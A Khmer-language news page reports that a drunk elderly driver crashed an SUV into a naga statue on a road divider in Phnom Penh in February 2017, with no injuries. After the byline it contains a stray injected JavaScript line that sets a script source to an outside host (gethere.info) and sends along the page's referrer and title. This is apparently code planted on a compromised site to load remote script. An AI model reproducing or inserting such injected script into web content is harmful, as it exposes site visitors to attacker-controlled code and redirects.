Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

យកជើងទ្រមេឃរថយន្តហាយឡែនឌ័រម្ចាស់ស្រវឹងស្រាបើកបុកក្បាលនាគ

ភ្នំពេញ៖ បុរសវយ័ចំណាស់ម្នាក់ស្រវឹងស្រាជោគជាំបើករថយន្តលឿនដូចហោះជ្រុលចង្កូតទៅបុកក្បាលនាគពុះចែកទ្រូងផ្លូវបាក់អស់មួយកង់រថយន្តក្រទ្បាប់ផ្ងាជើងឡើងលើច្រង៉ាងទៅមុខលែងរួច។ ហេតុការណ៏នេះកើតទ្បើងការពីវេលាម៉ោង១និង២០នាទីរំលងអាធ្រាត្រឈានចូលថ្ងៃទី១ ខែកុម្ភះ ឆ្នាំ២០១៧ ស្ថិតនៅចំណុចស្តុបណានជីង ក្នុងសង្កាត់វាលវង់ ខណ្ឌ៧មករា។

យោងតាមប្រភពព័ត៌មានពីកន្លែងកើតហេតុបានឲ្យដឹងថា មុនកើតហេតគេឃើញបុរសវ័យ​ចំណាស់ម្នាក់ ស្រវឹងស្រាជោគ​ជាំ បើករថយន្តមួយគ្រឿងម៉ាកហាយទ្បេនឌ័រ ពណ៌ទឺកប៊ិច ស្លាកលេខភ្នំពេញ2S-7822 បើកបរតាមបណ្តោយផ្លូវ១២៨ ទិសដៅពីលិចទៅកើត ខណៈមកដល់ចំណុចកើតហេតុខាងលើ បានរេចង្កូតទៅបុកក្បាលនាគពុះចែកទ្រូងផ្លូវពេញទំហឹងបណ្តាលឲ្យបាក់មួយកង់ ហើយរថយន្តក្រទ្បាប់ផ្ងាជើងឡើងលើច្រង៉ាងទៅមុខលែងរួចរីឯរថយន្តបង្កខូចខាតយ៉ាងដំណំ សំណាងល្អមិនមានអ្នកណារងរបួសនោះទេ។
ក្រោយកើតហេតុសមត្ថកិច្ចមូលដ្ឋានបានចុះមកដល់បានទំនាក់ទំនងទៅសមត្ថកិច្ជំនាញចុះមកវាស់វែងយករថយន្តបង្ករទៅរក្សាទុកនៅការិយាលយ័ចរាចរណ៏ផ្លូវគោករាជធានីភ្នំពេញរងចាំដោះស្រាយគ្នាទៅតាមផ្លូវច្បាប់៕ដោយ៖ព្រះអង្គខ្មៅមានរិទ្ធ

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More